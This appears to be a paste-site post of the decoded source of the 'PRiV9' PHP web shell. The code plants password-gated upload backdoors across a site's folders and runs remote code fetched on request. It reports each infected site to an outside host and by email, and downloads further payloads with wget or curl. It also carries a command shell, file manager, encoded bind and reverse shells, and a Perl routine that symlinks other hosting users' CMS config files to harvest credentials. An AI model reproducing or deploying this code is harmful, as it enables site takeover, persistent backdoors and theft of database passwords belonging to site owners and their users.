
ATTACK SHELL PRiV9 belong to r00t.info fully decoded by 3H34N(nezami.me)

a guest
Aug 17th, 2020
  1.  
  2. ?><script src=hxxp://r00t.info/ccb.js></script>
  3. <?php @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('output_buffering',0); @set_time_limit(0); @set_magic_quotes_runtime(0); ?>
  4. <?php @session_start(); @error_reporting(0); $a = '<?php
  5. session_start();
  6. if($_SESSION["adm"]){
  7. echo \'<b>Namesis<br><br>\'.php_uname().\'<br></b>\';echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST[\'_upl\'] == "Upload" ) {   if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Success !!!</b><br><br>\'; } else { echo \'<b>Upload Fail !!!</b><br><br>\'; }}
  8. }
  9. if($_POST["p"]){
  10. $p = $_POST["p"];
  11. $pa = md5(sha1($p));
  12. if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){
  13. $_SESSION["adm"] = 1;
  14. }
  15. }
  16. ?>
  17. <form action="" method="post">
  18. <input type="text" name="p">
  19. </form>
  20. '; if(@$_REQUEST["px"]){ $p = @$_REQUEST["px"]; $pa = md5(sha1($p)); if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){ echo @eval(@file_get_contents(@$_REQUEST["404"])); } } if(@!$_SESSION["sdm"]){ $doc = $_SERVER["DOCUMENT_ROOT"]; $dir = scandir($doc); $d1 = ''.$doc.'/.'; $d2 = ''.$doc.'/..'; if(($key = @array_search('.', $dir)) !== false) { unset($dir[$key]); } if(($key = @array_search('..', $dir)) !== false) { unset($dir[$key]); } if(($key = @array_search($d1, $dir)) !== false) { unset($dir[$key]); } if(($key = array_search($d2, $dir)) !== false) { unset($dir[$key]); } @array_push($dir,$doc); foreach($dir as $d){ $p = $doc."/".$d; if(is_dir($p)){ $file = $p."/newsr.php"; @touch($file); $folder = @fopen($file,"w"); @fwrite($folder,$a); } } $lls = $_SERVER["hxxp_HOST"]; $llc = $_SERVER["REQUEST_URI"]; $lld = 'hxxp://'.$lls.''.$llc.''; $brow = urlencode($_SERVER['hxxp_USER_AGENT']); $retValue = file_get_contents(base64_decode("hxxp://r00t.info/yaz.php?a")."=".$lld.base64_decode("JmI=")."=".$brow); echo $retValue; @$_SESSION["sdm"]=1; } ?>
  21.  
  22.  
  23. <?php  if($_POST['query']){ $veriyfy = stripslashes(stripslashes($_POST['query'])); $data = "data.txt"; @touch ("data.txt"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $veriyfy ) ; @fclose ($ver); }else{ $datas=@fopen("data.txt",'r'); $i=0; while ($i <= 5) { $i++; $blue=@fgets($datas,1024); echo $blue; } } $datasi=@fopen("/modules/indexx.php",'r'); if($datasi){ }else{ @mkdir("modules"); $dos = file_get_contents("hxxp://r00t.info/txt/lamer.txt"); $data = "/modules/indexx.php"; @touch ("/modules/indexx.php"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $dos ) ; @fclose ($ver); $yol = "hxxp://".$_SERVER['hxxp_HOST']."".$_SERVER['REQUEST_URI'].""; $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.$yol.'<br/>Sender Yolu : modules/dbs.php</h1>'; $header .= "From: SheLL Boot <suppor@nic.org>\n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("priphp@hotmail.com", "Hacklink Bildiri", "$y", $header); } ?><?php  $auth_pass = "39352d42823587e2152e181173b0972a"; $color = "#FF0000"; $default_action = 'FilesMan'; @define('SELF_PATH', __FILE__); if( strpos($_SERVER['hxxp_USER_AGENT'],'Google') !== false ) { header('hxxp/1.0 404 Not Found'); exit; } @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('output_buffering',0); if(isset($_GET['dl']) && ($_GET['dl'] != "")){ $file = $_GET['dl']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file)."\";"); echo $filez; exit; } elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){ $file = $_GET['dlgzip']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file).".gz\";"); echo $filez; exit; } 
if(isset($_GET['img'])){ @ob_clean(); $d = magicboom($_GET['y']); $f = $_GET['img']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}} function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}} function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}} function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}} function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}} if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET['y'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } } function convertByte($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." 
&gt;"; $pwd = realpath(".")."\\"; $v = explode("\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\"); if ($bool) { $letters .= "<a href=\"?y=".$letter.":\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\"gaya\">".$letter."</span>";} $letters .= " ]</a> "; } } } function testoracle() { if (function_exists('ocilogon')) { return showstat("on"); } else { return showstat("off"); } } function testmssql() { if (function_exists('mssql_connect')) { return showstat("on"); } else { return showstat("off"); } } function showdisablefunctions() { if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; } else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["hxxp_HOST"]); $my_ip = $_SERVER['REMOTE_ADDR']; $admin_id=$_SERVER['SERVER_ADMIN']; $bindport = "13123"; $bindport_pass = "b374k"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } if(isset($_POST['chmod'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value;} @chmod($pwd.$name,octdec($value)); $file = $pwd.$name;} if(isset($_POST['chmod_folder'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . 
$value;} @chmod($pwd.$name,octdec($value)); $file = $pwd.$name;} $buff = "Software : <b>".$software."</b><br />"; $buff .= "System OS : <b>".$system."</b><br />"; if($id != "") $buff .= "ID : <b>".$id."</b><br />"; $buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />"; $buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your   ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />"; $buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />"; if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />"; else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />"; $buff .= "Disabled Functions: ".showdisablefunctions()."<br />"; $buff .= "MySQL: ".testmysql()."&nbsp;|&nbsp;MSSQL: ".testmssql()."&nbsp;|&nbsp;Oracle: ".testoracle()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>"; $buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>"; $injbuff = "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"; eval(base64_decode($injbuff)); function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = @scandir($pwd)){ foreach($dh as $file){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } } else{ if($dh = @opendir($pwd)){ while($file = @readdir($dh)){ if(@is_dir($file)){ $dname[] = $file; } elseif(@is_file($file)){ $fname[] = $file; } } @closedir($dh); } } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = 
@sizeof($path); $parent = ""; $buff = "
  24.     <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  25.     <table class=\"cmdbox\" style=\"width:50%;\">
  26.     <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  27.     </form>
  28.     <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  29.     <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  30.     <tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  31.     </form></table><table class=\"explore\">
  32.     <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
  33.     "; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
  34.             <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
  35.             <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
  36.             <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
  37.             <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  38.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  39.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  40.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  41.             </form></td>
  42.            
  43.             </tr>
  44.             "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src=''>   $folder</a></td><td>LINK</td>
  45.             <td style=\"text-align:center;\">".$owner."</td>
  46.             <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
  47.             <td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  48.             <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  49.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  50.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  51.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  52.             </form>
  53.             </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='' />     [ $folder ]</b></a>
  54.             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  55.             <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  56.             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  57.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  58.             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  59.             </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
  60.             <td><center>
  61.             <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
  62.             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  63.             <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  64.             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
  65.             <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  66.             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  67.             onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
  68.             <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><b><img src='' />   $file</b></a>
  69.         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  70.         <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  71.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  72.         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  73.         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  74.         </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
  75.         <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
  76.         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  77. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  78. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
  79. <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  80. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
  81.         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  82.         <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." 
> ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
  83. +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
  84. P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
  85. dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
  86. 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
  87. Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
  88. HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
  89. tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
  90. ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
  91. uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
  92. NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
  93. tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
  94. e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
  95. LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
  96. vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
  97. +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
  98. ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
  99. S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
  100. ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
  101. Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
  102. BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
  103. zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
  104. i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
  105. RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
  106. jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
  107. 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; $configshell = '#!/usr/bin/perl -I/usr/local/bandmin
  108. print "Content-type: text/html\n\n";
  109. print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hxxp://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  110. <html xmlns="hxxp://www.w3.org/1999/xhtml">
  111.  
  112. <head>
  113. <meta hxxp-equiv="Content-Language" content="en-us" />
  114. <meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8" />
  115. <title>Priv8 SCR</title>
  116. <style type="text/css">
  117. .newStyle1 {
  118.  font-family: tahoma, verdana, Arial;
  119.  font-size: medium;
  120.  color: #FFFFFF;
  121. background-color: #666666;
  122. text-align: center;
  123. }
  124. </style>
  125. </head>
  126. ';
  127. sub lil{
  128.    ($user) = @_;
  129. $msr = qx{pwd};
  130. $kola=$msr."/".$user;
  131. $kola=~s/\n//g;
  132. symlink('/home/'.$user.'/public_html/beta/configuration.php',$kola.'-joomla.txt') ;
  133. symlink('/home/'.$user.'/public_html/configuration.php',$kola.'-joomla.txt') ;
  134. symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'-joomla - home.txt') ;
  135. symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'-wordpress.txt') ;
  136. symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wordpress.txt') ;
  137. symlink('/home/'.$user.'/public_html/web/wp-config.php',$kola.'-wordpress - web.txt') ;
  138. symlink('/home/'.$user.'/public_html/SSI.php',$kola.'- C M F .txt') ;
  139. symlink('/home/'.$user.'/public_html/forum/SSI.php',$kola.'- C M F - forum.txt') ;
  140. symlink('/home/'.$user.'/public_html/inc/config.php',$kola.'- MyBB.txt') ;
  141. symlink('/home/'.$user.'/public_html/forum/inc/config.php',$kola.'- MyBB - forum.txt') ;
  142. symlink('/home/'.$user.'/public_html/config.php',$kola.'- Other.txt') ;
  143. symlink('/home/'.$user.'/public_html/lib/config.php',$kola.'- Balitbang.txt') ;
  144. symlink('/home/'.$user.'/public_html/client/configuration.php',$kola.'-clients.txt') ;
  145. symlink('/home/'.$user.'/public_html/clients/configuration.php',$kola.'-client.txt') ;
  146. symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.'-billing.txt') ;
  147. symlink('/home/'.$user.'/public_html/billings/configuration.php',$kola.'-billings.txt') ;
  148. symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$kola.'- whmcs - whmcs.txt') ;
  149. symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'- whm - whm.txt');
  150. symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'- VBulletin - forum.txt');
  151.  symlink('/home/'.$user.'/public_html/forum/config.php',$kola.' - PhpBB - forum.txt') ;
  152. symlink('/home/'.$user.'/public_html/whmc/configuration.php',$kola.'- whmc - whmc.txt');
  153.  symlink('/home/'.$user.'/public_html/submitticket.php',$kola.' - whmcs2.txt');
  154.  symlink('/home/'.$user.'/public_html/manage/configuration.php',$kola.' -mangewhmcs.txt');
  155.  symlink('/home/'.$user.'/public_html/myshop/configuration.php',$kola.' -myshop.txt');
  156. symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'-support.txt');
  157. symlink('/home/'.$user.'/public_html/supports/configuration.php',$kola.'-supports.txt');
  158. symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.'-oscommerce.txt');
  159. symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.'-oscommerces.txt');
  160. symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$kola.'-shop-shopping.txt');
  161. symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$kola.'-sale.txt');
  162. symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'-amember.txt');
  163. symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'-amember2.txt');
  164. symlink('/home/'.$user.'/public_html/wp/wp-config.php',$kola.'- wordpress - wp.txt');
  165. symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$kola.'- wwordpress - wp - beta.txt');
  166. symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'- wordpress - beta.txt');
  167. symlink('/home/'.$user.'/public_html/press/wp-config.php',$kola.'-wp13-press.txt');
  168. symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$kola.'- wordpress -wordpress.txt');
  169. symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.'- wordpress - wordpress-beta.txt');
  170. symlink('/home/'.$user.'/public_html/news/wp-config.php',$kola.'- wordpress -news.txt');
  171. symlink('/home/'.$user.'/public_html/new/wp-config.php',$kola.'- wordpress - new.txt');
